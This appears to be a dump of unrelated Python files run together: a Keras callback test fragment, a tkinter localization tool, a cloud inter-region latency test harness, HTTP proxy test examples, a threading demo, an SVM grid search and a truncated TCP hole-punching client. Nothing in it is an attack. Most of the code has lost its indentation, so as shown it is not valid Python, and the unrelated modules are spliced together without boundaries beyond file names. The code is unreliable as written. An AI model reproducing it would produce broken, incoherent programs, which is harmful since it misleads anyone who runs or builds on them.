cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
if __name__ == '__main__':
test.main()
|
app_gui.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from tkinter import *
import logging
import os
import threading
from tkinter.filedialog import askdirectory
from tkinter.messagebox import askokcancel
from tkinter.filedialog import askopenfilename
from tkinter.messagebox import showinfo
from tkinter.messagebox import showwarning
from initializer import appConfig as appConfig
from repository import repository as repository
from initializer import Initializer
from importer import Importer as Importer
from generator import Generator as Generator
from translator import Translator as Translator
from translator import BaiduTranslator as BaiduTranslator
# Repository initialization dialog
class RepoInitDialog(Frame):
    # Initialization
def __init__(self, root):
self.root = root
self.android_resources_dir = StringVar()
self.ios_resources_dir = StringVar()
self.support_languages = {}
Frame.__init__(self, root)
        # Selection of the multi-language resource root directories
fileFrame = Frame(root)
fileFrame.pack()
Label(fileFrame, text=">> 初始化:项目多语言仓库初始化", justify=CENTER).grid(row=1, column=1)
Label(fileFrame, text="1. 选择 Android 多语言资源根目录:", justify=LEFT).grid(row=2, column=1)
Entry(fileFrame, textvariable=self.android_resources_dir).grid(row=2, column=2)
Button(fileFrame, text="选择", command=self.select_android_directory).grid(row=2, column=3)
Label(fileFrame, text="2. 选择 iOS 多语言资源根目录:", justify=LEFT).grid(row=3, column=1)
Entry(fileFrame, textvariable=self.ios_resources_dir).grid(row=3, column=2)
Button(fileFrame, text="选择", command=self.select_ios_directory).grid(row=3, column=3)
        # Choose the languages to support
languageFrame = Frame(root)
languageFrame.pack()
colCount = -1
for k,v in appConfig.languages.items():
colCount = colCount + 1
self.support_languages[k] = BooleanVar()
Checkbutton(languageFrame, text=k, variable=self.support_languages[k]).grid(row=2, column=colCount)
        # Initialize button
startFrame = Frame(root)
startFrame.pack()
Button(startFrame, text="初始化", command=self.initialize_repo).grid(row=1, column=1)
    # Choose the Android multi-language resource root directory
def select_android_directory(self):
self.android_resources_dir.set(askdirectory())
logging.debug(self.android_resources_dir)
    # Choose the iOS multi-language resource root directory
def select_ios_directory(self):
self.ios_resources_dir.set(askdirectory())
logging.debug(self.ios_resources_dir)
    # Initialize the repository
def initialize_repo(self):
        # Initialize the app configuration
support_languages = []
for k,v in self.support_languages.items():
if v.get():
for language in appConfig.languages[k]:
support_languages.append(language)
        # Initialize the project repository
init = Initializer()
init.initialize(self.android_resources_dir.get(), self.ios_resources_dir.get(), support_languages)
        # Initialization finished
result = askokcancel(title = '初始化完成', message='已完成项目仓库初始化,请重启程序')
if result:
self.root.quit()
# Main application page
class MainDialog(Frame):
    # Initialization
def __init__(self, root):
self.importer = Importer(appConfig)
self.generator = Generator(appConfig)
self.translate_progress = StringVar()
self.translate_started = False
Frame.__init__(self, root)
frame = Frame(root)
frame.pack()
        # Update entries
# Label(frame, text="", justify=LEFT).grid(row=1, column=1)
Label(frame, text="1.更新词条", justify=LEFT).grid(row=2, column=1)
Button(frame, text="更新 Android 多语言词条", command=self.update_android_resource).grid(row=2, column=2)
Button(frame, text="更新 iOS 多语言词条", command=self.update_ios_resource).grid(row=2, column=3)
        # Self-service translation
# Label(frame, text="", justify=LEFT).grid(row=3, column=1)
Label(frame, text="2.自助翻译", justify=LEFT).grid(row=4, column=1)
Button(frame, text="自动翻译", command=self.auto_translate).grid(row=4, column=2)
Label(frame, textvariable=self.translate_progress).grid(row=4, column=3)
        # Import / export translation resources
# Label(frame, text="", justify=LEFT).grid(row=5, column=1)
Label(frame, text="3.人工翻译", justify=LEFT).grid(row=6, column=1)
Button(frame, text="导出翻译资源(Excel)", command=self.generate_translate_resources).grid(row=6, column=2)
Button(frame, text="导入翻译资源(Excel)", command=self.import_translated_excel).grid(row=6, column=3)
        # Generate multi-language resources
# Label(frame, text="", justify=LEFT).grid(row=7, column=1)
Label(frame, text="4.生成资源", justify=LEFT).grid(row=8, column=1)
Button(frame, text="生成 Android 多语言资源", command=self.generate_android_resources).grid(row=8, column=2)
Button(frame, text="生成 iOS 多语言资源", command=self.generate_ios_resources).grid(row=8, column=3)
        # Verify multi-language resources
# Label(frame, text="", justify=LEFT).grid(row=9, column=1)
Label(frame, text="5.校验资源", justify=LEFT).grid(row=10, column=1)
Button(frame, text="将 Android 多语言资源修改结果同步到仓库", command=self.import_modified_android_resource).grid(row=10, column=2)
Button(frame, text="将 iOS 多语言资源修改结果同步到仓库", command=self.import_modified_ios_resource).grid(row=10, column=3)
    # Sync modified Android multi-language resources back to the repository
def import_modified_android_resource(self):
        # If the multi-language root directory has not been configured, warn and return
if len(appConfig.android_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 Android 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
        # Start updating
self.importer.import_modified_android_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
    # Sync modified iOS multi-language resources back to the repository
def import_modified_ios_resource(self):
        # If the multi-language root directory has not been configured, warn and return
if len(appConfig.ios_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 iOS 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
        # Start updating
self.importer.import_modified_ios_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
    # Generate Android multi-language resources
    def generate_android_resources(self):
        # Check how many entries are still untranslated
        ret = repository.get_repo_state()
        missed_count = ret["missed_count"]
        if missed_count != 0:
            result = askokcancel(title="警告", message="存在 %d 个词条没有完全翻译!仍然生成?" % missed_count)
            if result:
                self.__generate_android_resources_finaly()
        else:
            self.__generate_android_resources_finaly()
    # Generate iOS multi-language resources
    def generate_ios_resources(self):
        # Check how many entries are still untranslated
        ret = repository.get_repo_state()
        missed_count = ret["missed_count"]
        if missed_count != 0:
            result = askokcancel(title="警告", message="存在 %d 个词条没有完全翻译!仍然生成?" % missed_count)
            if result:
                self.__generate_ios_resources_finaly()
        else:
            self.__generate_ios_resources_finaly()
    # Generate the Excel sheet used for translation
def generate_translate_resources(self):
        # Folder to export to
appConfig.translate_excel_output_directory = askdirectory()
appConfig.write_to_json()
        # Export the Excel file
self.generator.gen_translate_excel(appConfig.translate_excel_output_directory)
showinfo(title='导出完成', message='已导出翻译 Excel 到 %s !' % appConfig.translate_excel_output_directory)
    # Import translated resources
def import_translated_excel(self):
f = askopenfilename(title='选择 Excel 文件', filetypes=[('Excel', '*.xlsx'), ('All Files', '*')])
self.importer.import_translated_excel(f)
showinfo(title='更新完成', message='已更新到多语言仓库!')
    # Update Android multi-language entries
def update_android_resource(self):
        # If the multi-language root directory has not been configured, warn and return
if len(appConfig.android_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 Android 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
        # Start updating
self.importer.update_android_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
    # Update iOS multi-language entries
def update_ios_resource(self):
        # If the multi-language root directory has not been configured, warn and return
if len(appConfig.ios_resources_root_directory) == 0:
showinfo(title='提示', message='您在初始化项目的时候并没有为 iOS 指定多语言根目录,无法完成更新。您可以尝试备份并删除 repo.json 文件重新初始化项目仓库。')
return
        # Start updating
self.importer.update_ios_resource()
showinfo(title='更新完成', message='已更新到多语言仓库!')
    # Automatically translate the missing entries
    def auto_translate(self):
        bd = BaiduTranslator()
        if not bd.is_configed():
            showinfo(title='百度 API 没有配置', message='请在 config/baidu.json 文件中填写您在平台申请的 appid 和 appsecret 之后再尝试!')
            return
        ret = repository.get_repo_state()
        missed_count = ret["missed_count"]
        if self.translate_started:
            showinfo(title='翻译已启动', message='翻译已经启动,程序正在翻译中……')
            return
        if missed_count == 0:
            showinfo(title='已全部翻译完成', message='所有词条已经翻译完毕,无需进行自动翻译')
        else:
            thread = threading.Thread(target=self.__start_translate)
            thread.start()
            self.translate_started = True
    # Run the translation job
def __start_translate(self):
translator = Translator()
translator.start_translate(self.on_translation_progress_changed, self.on_translation_finished)
    # Notify a change in translation progress
def on_translation_progress_changed(self, progress):
logging.debug("On translation progress changed " + str(progress))
self.translate_progress.set("当前进度: %d%%" % progress)
    # Callback invoked when translation has finished
def on_translation_finished(self):
self.translate_started = False
showinfo(title='翻译完成', message='已完成翻译任务')
    # Generate the iOS resource directory
def __generate_ios_resources_finaly(self):
        # If the iOS resource directory is not set, ask the user to choose one
if len(appConfig.ios_resources_root_directory) == 0:
showinfo(title='提示', message='请先选择 iOS 多语言资源根目录')
appConfig.ios_resources_root_directory = askdirectory()
appConfig.write_to_json()
        # Generate
self.generator.gen_ios_resources()
showinfo(title='导出完成', message='已导出 iOS 多语言文件到 ' + appConfig.ios_resources_root_directory)
    # Generate the Android resource directory
def __generate_android_resources_finaly(self):
        # If the Android resource directory is not set, ask the user to choose one
if len(appConfig.android_resources_root_directory) == 0:
showinfo(title='提示', message='请先选择 Android 多语言资源根目录')
appConfig.android_resources_root_directory = askdirectory()
appConfig.write_to_json()
        # Generate
self.generator.gen_android_resources()
showinfo(title='导出完成', message='已导出 Android 多语言文件到 ' + appConfig.android_resources_root_directory)
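# --- Bootstrap sketch (not part of the original module) ---
# This file defines the dialogs but no entry point. A typical Tk bootstrap is
# sketched below; the window title is a placeholder, and deciding whether to
# show RepoInitDialog first (e.g. when no repo.json exists yet) is project
# logic that is not shown here.
if __name__ == '__main__':
    root = Tk()
    root.title('Localization Tool')
    MainDialog(root)
    root.mainloop()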
|
performance_test.py
|
import datetime
import itertools
import json
import logging
import os
import random
import shutil
import string
import sys
import threading
from typing import List, Dict, Tuple
from history.attempted import remove_already_attempted, write_attempted_tests
from cloud.clouds import Cloud, CloudRegion, interregion_distance
from history.results import combine_results_to_jsonl, untested_regionpairs, jsonl_to_csv
from util.subprocesses import run_subprocess
from util.utils import dedup
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%H:%M:%S",
)
def __env_for_singlecloud_subprocess(run_id, cloud_region):
return {
"PATH": os.environ["PATH"],
"REGION": cloud_region.region_id,
"RUN_ID": run_id,
} | cloud_region.env()
def __create_vms(
regions: List[CloudRegion], run_id: str
) -> List[Tuple[CloudRegion, Dict]]:
# TODO Improve thread use with ThreadPoolExecutor and futures
def create_vm(
run_id_: str,
cloud_region_: CloudRegion,
vm_region_and_address_infos_inout: List[Tuple[CloudRegion, Dict]],
):
logging.info("Will launch a VM in %s", cloud_region_)
env = __env_for_singlecloud_subprocess(run_id_, cloud_region_)
process_stdout = run_subprocess(cloud_region_.script(), env)
vm_addresses = {}
vm_address_info = process_stdout
if vm_address_info[-1] == "\n":
vm_address_info = vm_address_info[:-1]
vm_address_infos = vm_address_info.split(",")
vm_addresses["address"] = vm_address_infos[0]
if len(vm_address_infos) > 1:
vm_addresses["name"] = vm_address_infos[1]
vm_addresses["zone"] = vm_address_infos[2]
vm_region_and_address_infos_inout.append((cloud_region_, vm_addresses))
def sort_addr_by_region(
vm_region_and_address_infos: List[Tuple[CloudRegion, Dict]],
regions: List[CloudRegion],
):
ret = []
for region in regions:
for_this_region = [t for t in vm_region_and_address_infos if t[0] == region]
if len(for_this_region) != 1:
logging.error(
"For region %s found this data %s. Had these VMs %s}",
region,
for_this_region,
vm_region_and_address_infos,
)
if for_this_region:
ret.append(for_this_region[0])
return ret
vm_region_and_address_infos = []
threads = []
regions_dedup = dedup(regions)
for cloud_region in regions_dedup:
thread = threading.Thread(
name=f"create-{cloud_region}",
target=create_vm,
args=(run_id, cloud_region, vm_region_and_address_infos),
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
logging.info('create_vm in "%s" done', thread.name)
ret = sort_addr_by_region(vm_region_and_address_infos, regions)
return ret
def __do_tests(
run_id: str,
vm_region_and_address_infos: List[Tuple[CloudRegion, Dict]],
):
results_dir_for_this_runid = f"./result-files-one-run/results-{run_id}"
try:
os.mkdir(results_dir_for_this_runid)
except FileExistsError:
pass
def run_test(run_id, src: Tuple[CloudRegion, Dict], dst: Tuple[CloudRegion, Dict]):
logging.info("running test from %s to %s", src, dst)
src_region_, src_addr_infos = src
dst_region_, dst_addr_infos = dst
env = {
"PATH": os.environ["PATH"],
"RUN_ID": run_id,
"SERVER_PUBLIC_ADDRESS": dst_addr_infos["address"],
"SERVER_CLOUD": dst_region_.cloud.name,
"CLIENT_CLOUD": src_region_.cloud.name,
"SERVER_REGION": dst_region_.region_id,
"CLIENT_REGION": src_region_.region_id,
}
        # Use the region unpacked from `src` above, not the enclosing loop
        # variable, which may already point at a later pair when this thread runs.
        if src_region_.cloud == Cloud.AWS:
env |= {
"CLIENT_PUBLIC_ADDRESS": src_addr_infos["address"],
"BASE_KEYNAME": "intercloudperfkey",
}
        elif src_region_.cloud == Cloud.GCP:
try:
env |= {
"CLIENT_NAME": src_addr_infos["name"],
"CLIENT_ZONE": src_addr_infos["zone"],
}
except KeyError as ke:
logging.error("{src_addr_infos=}")
raise ke
else:
            raise Exception(f"Implement {src_region_}")
non_str = [(k, v) for k, v in env.items() if type(v) != str]
assert not non_str, non_str
        script = src_region_.script_for_test_from_region()
process_stdout = run_subprocess(script, env)
logging.info(
"Test %s result from %s to %s is %s", run_id, src, dst, process_stdout
)
test_result = process_stdout + "\n"
result_j = json.loads(test_result)
result_j["distance"] = interregion_distance(src_region_, dst_region_)
# We write separate files for each test to avoid race conditions, since tests happen in parallel.
with open(
f"{results_dir_for_this_runid}/results-{src_region_}-to-{dst_region_}.json",
"w",
) as f:
json.dump(result_j, f)
vm_pairs: List[Tuple[Tuple[CloudRegion, Dict], Tuple[CloudRegion, Dict]]]
assert len(vm_region_and_address_infos) % 2 == 0, (
f"Must provide an even number of region in pairs for tests:"
f" was length {len(vm_region_and_address_infos)}: {vm_region_and_address_infos}"
)
vm_pairs = [
(vm_region_and_address_infos[i], vm_region_and_address_infos[i + 1])
for i in range(0, len(vm_region_and_address_infos), 2)
]
logging.info(
"%s tests and %s regions ",
len(vm_pairs),
len(vm_region_and_address_infos),
)
threads = []
for src, dest in vm_pairs:
src_region = src[0]
dst_region = dest[0]
thread_name = f"{src_region}-{dst_region}"
        logging.info("Will run test %s", thread_name)
thread = threading.Thread(
name=thread_name, target=run_test, args=(run_id, src, dest)
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
logging.info('"%s" done', thread.name)
combine_results_to_jsonl(results_dir_for_this_runid)
#shutil.rmtree(results_dir_for_this_runid)
def __delete_vms(run_id, regions: List[CloudRegion]):
def delete_aws_vm(aws_cloud_region: CloudRegion):
assert aws_cloud_region.cloud == Cloud.AWS, aws_cloud_region
logging.info(
"Will delete EC2 VMs from run-id %s in %s", run_id, aws_cloud_region
)
env = __env_for_singlecloud_subprocess(run_id, aws_cloud_region)
        # Use the region passed to this function, not the enclosing loop variable.
        script = aws_cloud_region.deletion_script()
_ = run_subprocess(script, env)
# First, AWS
aws_regions = [r for r in regions if r.cloud == Cloud.AWS]
threads = []
for cloud_region in aws_regions:
thread = threading.Thread(
name=f"delete-{cloud_region}", target=delete_aws_vm, args=(cloud_region,)
)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
logging.info("%s done", thread.name)
# Now GCP
gcp_regions = [r for r in regions if r.cloud == Cloud.GCP]
if gcp_regions:
cloud_region = gcp_regions[
0
] # One arbitrary region, for getting values for GCP.
logging.info("Will delete GCE VMs from run-id %s", run_id)
env = __env_for_singlecloud_subprocess(run_id, cloud_region)
_ = run_subprocess(cloud_region.deletion_script(), env)
def __setup_and_tests_and_teardown(run_id: str, regions: List[CloudRegion]):
"""regions taken pairwise"""
# Because we launch VMs and runs tests multithreaded, if one launch fails or one tests fails, run_tests() will not thrown an Exception.
# So, VMs will still be cleaned up
assert len(regions) % 2 == 0, f"Expect pairs {regions}"
vm_region_and_address_infos = __create_vms(regions, run_id)
logging.info(vm_region_and_address_infos)
__do_tests(run_id, vm_region_and_address_infos)
__delete_vms(run_id, regions)
def test_region_pairs(region_pairs: List[Tuple[CloudRegion, CloudRegion]], run_id):
write_attempted_tests(region_pairs)
regions = list(itertools.chain(*region_pairs))
__setup_and_tests_and_teardown(run_id, regions)
def main():
logging.info("Started at %s", datetime.datetime.now().isoformat())
run_id = "".join(random.choices(string.ascii_lowercase, k=4))
if len(sys.argv) > 1:
gcp_project = sys.argv[1]
else:
gcp_project = None # use default
region_pairs = untested_regionpairs()
region_pairs = remove_already_attempted(region_pairs)
region_pairs.sort()
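    # Batch the region pairs so each call to test_region_pairs() only has group_size
    # VM pairs live (created, tested, and deleted) at a time.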
group_size = 6
groups_ = [
region_pairs[i : i + group_size]
for i in range(0, len(region_pairs), group_size)
]
groups_ = groups_[:2] # REMOVE!
    tot_len = sum(len(g) for g in groups_)
    logging.info(f"Running tests on only {tot_len} region pairs")
for group in groups_:
test_region_pairs(group, run_id)
jsonl_to_csv()
if __name__ == "__main__":
main()
|
pydeproxy_examples.py
|
import ssl
import urlparse
import socket
import deproxy
import tornado
from tornado import httpclient
import threading
# Example socket based responder
class CustomResponder:
def send_response(self, wfile, response):
"""
Send the given Response over the socket. Add Server and Date headers
if not already present.
"""
message = response.message
wfile.write("HTTP/1.1 %s %s\r\n" %
(response.code, message))
for name, value in response.headers.iteritems():
wfile.write("%s: %s\r\n" % (name, value))
wfile.write("\r\n")
if response.body is not None and len(response.body) > 0:
wfile.write(response.body)
if response.headers["Connection"] and response.headers["Connection"].lower == 'close':
wfile.close()
# Example socket based requestor
class CustomRequestor:
def send_request(self, url, request, ssl_options=None, verify=None):
urlparts = list(urlparse.urlsplit(url, 'http'))
scheme = urlparts[0]
host = urlparts[1]
urlparts[0] = ''
urlparts[1] = ''
path = urlparse.urlunsplit(urlparts)
hostparts = host.split(':')
if len(hostparts) > 1:
port = hostparts[1]
else:
if scheme == 'https':
port = 443
else:
port = 80
hostname = hostparts[0]
hostip = socket.gethostbyname(hostname)
request_line = '%s %s HTTP/1.1\r\n' % (request.method, path if path else '/')
print(request_line)
lines = [request_line]
for name, value in request.headers.iteritems():
lines.append('%s: %s\r\n' % (name, value))
lines.append('\r\n')
if request.body is not None and len(request.body) > 0:
lines.append(request.body)
address = (hostname, port)
if scheme == 'https':
s = self.create_ssl_connection(address)
else:
s = socket.create_connection(address)
s.send(''.join(lines))
rfile = s.makefile('rb', -1)
response_line = rfile.readline(65537)
if (len(response_line) > 65536):
raise ValueError
response_line = response_line.rstrip('\r\n')
words = response_line.split()
proto = words[0]
code = words[1]
message = ' '.join(words[2:])
response_headers = deproxy.HeaderCollection.from_stream(rfile)
body = read_body_from_stream(rfile, response_headers)
response = deproxy.Response(code, message, response_headers, body)
return response
def create_ssl_connection(self, address,
timeout=socket._GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
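        # A TLS variant of socket.create_connection(): try each resolved address,
        # wrapping the socket with ssl.wrap_socket() before connecting.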
host, port = address
err = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
sock = ssl.wrap_socket(sock)
if timeout is not socket._GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(timeout)
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error as _:
err = _
if sock is not None:
sock.close()
def read_body_from_stream(stream, headers):
if ('Transfer-Encoding' in headers and
headers['Transfer-Encoding'] not in ['identity', 'chunked']):
raise NotImplementedError
elif 'Transfer-Encoding' in headers and headers['Transfer-Encoding'] == 'chunked':
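        # Chunked encoding: each chunk is "<hex length>[;extensions]\r\n<data>\r\n",
        # and the body is terminated by a zero-length chunk.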
body = ""
while True:
line = stream.readline()
            i = line.find(';')  # ignore chunk extensions
if i >= 0:
line = line[:i]
chunk_length = int(line, 16)
if chunk_length == 0:
break
body = body + stream.read(chunk_length)
stream.read(2) # remove CRLF
    elif 'Content-Length' in headers:
        # Body length is given explicitly by Content-Length
        length = int(headers['Content-Length'])
        body = stream.read(length)
else:
body = None
return body
# Template naive proxy
class MainHandler(tornado.web.RequestHandler):
def get(self):
# Route by path
aux_port = self.request.path.split('/')[-1]
service_port = self.request.path.split('/')[-2]
http_client = httpclient.HTTPClient()
try:
# Generate requests to forward
aux_request = clone_request(self.request)
service_request = clone_request(self.request)
aux_request.url = "http://localhost:" + aux_port + '/' + self.request.uri
service_request.url = "http://localhost:" + service_port + '/' + self.request.uri
# Make requests
aux_response = http_client.fetch(aux_request)
service_response = http_client.fetch(service_request)
# Respond to client
self.set_status(service_response.code, service_response.reason)
for k, v in service_response.headers.get_all():
self.set_header(k,v)
self.write(service_response.body)
except httpclient.HTTPError as e:
# HTTPError is raised for non-200 responses; the response
# can be found in e.response.
# Catch possible 401 from aux service
self.set_status(e.response.code, e.response.reason)
for k, v in e.response.headers.get_all():
self.set_header(k, v)
self.write(e.response.body)
except Exception as e:
print(e)
http_client.close()
self.flush()
def clone_request(source):
return httpclient.HTTPRequest('', source.method,source.headers, None)
def make_app():
return tornado.web.Application([
(r"/.*", MainHandler),
])
def test_handler(req):
return deproxy.Response(200, message='OK')
def auth_handler(req):
if req.path.split('?')[-1] == 'true':
return deproxy.Response(200, message='OK', headers=req.headers)
else:
return deproxy.Response(401, message='OK', headers=req.headers, body='unauthorized')
def service_handler(req):
h = {'Service-Header': 'I is a service'}
h.update(req.headers)
return deproxy.Response(200, message='OK', headers=h, body="Hi! I am a service!")
#PROXY
def start_proxy():
application = make_app()
application.listen(8888)
tornado.ioloop.IOLoop.current().start()
def run_proxy():
dp = deproxy.Deproxy()
auth_port = 9997
service_port = 9998
threading.Thread(target=start_proxy).start()
auth_ep = dp.add_endpoint(port=auth_port, default_handler=auth_handler)
service_ep = dp.add_endpoint(port=service_port, default_handler=service_handler)
mc = dp.make_request(url='http://localhost:8888/{}/{}'.format(service_port, auth_port))
for handling in mc.handlings:
print(handling.request)
print(handling.response)
mc2 = dp.make_request(url='http://localhost:8888/{}/{}?true'.format(service_port, auth_port))
for handling in mc2.handlings:
print(handling.request)
print(handling.response)
print(mc.sent_request)
print(mc.received_response)
auth_ep.shutdown()
service_ep.shutdown()
def use_custom_requester_responder():
dp = deproxy.Deproxy()
ep1 = dp.add_endpoint(port=9997)
ep2 = dp.add_endpoint(port=9998, responder=CustomResponder())
ep3 = dp.add_endpoint(port=9999, set_reserved_headers=False)
mc1 = dp.make_request(url='http://localhost:9997')
mc2 = dp.make_request(url='http://localhost:9998', default_handler=test_handler)
mc3 = dp.make_request(url='http://localhost:9999', default_handler=test_handler, requestor=CustomRequestor())
print(mc1.handlings[0].request)
print(mc1.handlings[0].response)
print(mc2.handlings[0].request)
print(mc2.handlings[0].response)
print(mc3.handlings[0].request)
print(mc3.handlings[0].response)
def main():
run_proxy()
use_custom_requester_responder()
main()
|
mtprint2.py
|
import time
import threading
def hello(a, b):
time.sleep(3)
print('Hello', a, b)
if __name__ == '__main__':
for i in range(3):
t = threading.Thread(target=hello, args=('aaa', 'bbb'))
        t.start()  # start the worker thread, which calls target(*args)
|
gridsearch.py
|
from sklearn.metrics import confusion_matrix
from threading import Thread
import time
from Queue import Queue, Empty
import multiprocessing
from lib.in_subject_cross_validation import *
import lib.in_subject_cross_validation as libcv
import sys
import argparse
q = Queue()
# Performs recursive feature elimination until 'attribute count' has been reached
def _eliminate_features(X_test, X_train, attribute_count, y_train):
clf = LinearSVC(class_weight='auto')
rfe = RFE(clf, n_features_to_select=attribute_count, step=1)
fit = rfe.fit(X_train, y_train)
# Reduce the feature matrices to contain just the selected features
X_train = [fit.transform(X) for X in X_train]
X_test = [fit.transform(X) for X in X_test]
return X_test, X_train
def _cv_instances(Xs, ys, test_index, train_index, result_pairs, attribute_count):
# print "Cross validating with %d left out" % test_index
Xs_train, Xs_test = flatten(Xs[train_index]), flatten(Xs[test_index])
ys_train, ys_test = flatten(ys[train_index]), flatten(ys[test_index])
transformer = preprocessing.MinMaxScaler().fit(to_float(flatten(Xs)))
Xs_train = transformer.transform(to_float(Xs_train))
Xs_test = transformer.transform(to_float(Xs_test))
if attribute_count is not None:
Xs_test, Xs_train = _eliminate_features(Xs_test, Xs_train, attribute_count, ys_train)
Xs_test = flatten(Xs_test)
Xs_train = flatten(Xs_train)
clf = SVC(**SVC_parameters)
# clf = LinearSVC(class_weight='auto')
clf.fit(to_float(Xs_train), ys_train)
ys_pred = clf.predict(to_float(Xs_test))
predicted_class = list(ys_pred)
actual_class = ys_test
print "%d, %.3f" % (test_index[0], accuracy_score(actual_class, predicted_class))
# print "Finished cross validation for %d" % test_index
result_pairs.append((actual_class, predicted_class))
def threaded_worker():
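    # Each worker drains the shared queue, running one leave-one-out fold per item,
    # and exits once the queue is empty.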
while True:
try:
arguments = q.get(False)
_cv_instances(*arguments)
q.task_done()
except Empty:
break
def cross_validate_combined_dataset(Xs, ys, num_attributes=None, threaded=False):
leave_one_out = cross_validation.LeaveOneOut(len(ys))
result_pairs = []
threads = []
for train_index, test_index in leave_one_out:
if threaded:
q.put((Xs, ys, test_index, train_index, result_pairs, num_attributes))
else:
_cv_instances(Xs, ys, test_index, train_index, result_pairs, num_attributes)
if threaded:
for num in range(1, multiprocessing.cpu_count()):
print "Starting thread %d" % num
thread = Thread(target=threaded_worker)
threads.append(thread)
thread.start()
[thread.join() for thread in threads]
actual_classes = [actual for (actual, _) in result_pairs]
predicted_classes = [predicted for (_, predicted) in result_pairs]
return flatten(actual_classes), flatten(predicted_classes)
def flatten(list):
return [item for sublist in list for item in sublist]
def to_float(list):
return [[float(item) for item in sublist] for sublist in list]
def print_report(actual, attr_count, class_id, dataset, predicted):
# Print the performance to the console
conf_matrix = confusion_matrix(actual, predicted, ['low', 'high'])
print ""
print conf_matrix
scores = f1_score(actual, predicted, ['low', 'high'], 'low', average=None)
average_f1 = np.average(scores)
accuracy = accuracy_score(actual, predicted)
print "\nAverage F1 score: %.3f" % average_f1
print "Average accuracy: %.3f" % accuracy
low_ratings = [p for (idx, p) in enumerate(predicted) if actual[idx] == 'low']
high_ratings = [p for (idx, p) in enumerate(predicted) if actual[idx] == 'high']
print "Low accuracy: %.3f" % (float(low_ratings.count('low')) / len(low_ratings))
print "High accuracy: %.3f" % (float(high_ratings.count('high')) / len(high_ratings))
attr_names = ["valence", "arousal", "control"]
print "%s,leave-one-subject-out%s,%s,%s,%.3f,%.3f" % (
dataset, '' if (attr_count is None) else '-rfe', attr_names[class_id], time.strftime('%Y-%m-%d'), average_f1,
accuracy)
import numpy as np
import pylab as pl
from sklearn.svm import SVC
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import load_iris
from sklearn.cross_validation import StratifiedKFold
from sklearn.grid_search import GridSearchCV
parser = argparse.ArgumentParser(description='Perform cross-validation on the dataset, cross-validating the behavior of one specific subject.')
parser.add_argument('dataset', help='name of the dataset folder')
parser.add_argument('class_id', type=int, help='target class id, 0-2')
parser.add_argument('ground_truth_count', type=int, help='number of ground truth values, 1-3')
args = parser.parse_args()
print args
##############################################################################
# Load and prepare data set
#
# dataset for grid search
Xs, ys = libcv._load_full_dataset(args.dataset, args.class_id, args.ground_truth_count)
X = to_float(flatten(Xs))
y = flatten(ys)
# It is usually a good idea to scale the data for SVM training.
# We are cheating a bit in this example in scaling all of the data,
# instead of fitting the transformation on the training set and
# just applying it on the test set.
scaler = StandardScaler()
X = scaler.fit_transform(X)
##############################################################################
# Train classifier
#
# For an initial search, a logarithmic grid with basis
# 10 is often helpful. Using a basis of 2, a finer
# tuning can be achieved but at a much higher cost.
C_range = 10.0 ** np.arange(-1, 5)
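# i.e. C in {0.1, 1, 10, 100, 1000, 10000}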
param_grid = dict(C=C_range)
cv = StratifiedKFold(y=y, n_folds=3)
grid = GridSearchCV(SVC(kernel='linear'), param_grid=param_grid, cv=cv, n_jobs=-1)
grid.fit(X, y)
print("The best classifier is: ", grid.best_estimator_)
|
tlsc.py
|
#!/usr/bin/env python
import sys
import logging
import socket
import struct
from threading import Event, Thread
from util import *
import ssl
logger = logging.getLogger('client')
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(message)s')
STOP = Event()
c_cont=ssl.create_default_context()
s_cont=ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def accept(port):
logger.info("accept %s", port)
s = create_socket()
s.bind(('', port))
s.listen(1)
s.settimeout(5)
while not STOP.is_set():
try:
conn, addr = s.accept()
except socket.timeout:
continue
else:
logger.info("Accept %s connected!", port)
# STOP.set()
def connect(local_addr, addr):
logger.info("connect from %s to %s", local_addr, addr)
s = create_socket()
s.bind(local_addr)
while not STOP.is_set():
try:
s.connect(addr)
except socket.error:
continue
# except Exception as exc:
# logger.exception("unexpected exception encountered")
# break
else:
logger.info("connected from %s to %s success!", local_addr, addr)
# STOP.set()
def main(host='54.187.46.146', port=5005):
sa = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sa.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sa.connect((host, port))
sa=c_cont.wrap_socket(sa,server_hostname=host)
priv_addr = sa.getsockname()
send_msg(sa, addr_to_msg(priv_addr))
data = recv_msg(sa)
logger.info("client %s %s - received data: %s", priv_addr[0], priv_addr[1], data)
pub_addr = msg_to_addr(data)
send_msg(sa, addr_to_msg(pub_addr))
data = recv_msg(sa)
pubdata, privdata = data.split(b'|')
client_pub_addr = msg_to_addr(pubdata)
client_priv_addr = msg_to_addr(privdata)
logger.info(
"client public is %s and private is %s, peer public is %s private is %s",
pub_addr, priv_addr, client_pub_addr, client_priv_addr,
)
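    # TCP hole punching: keep accepting on our own ports while repeatedly trying to
    # connect to the peer's public and private addresses until one path gets through.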
threads = {
'0_accept': Thread(target=accept, args=(priv_addr[1],)),
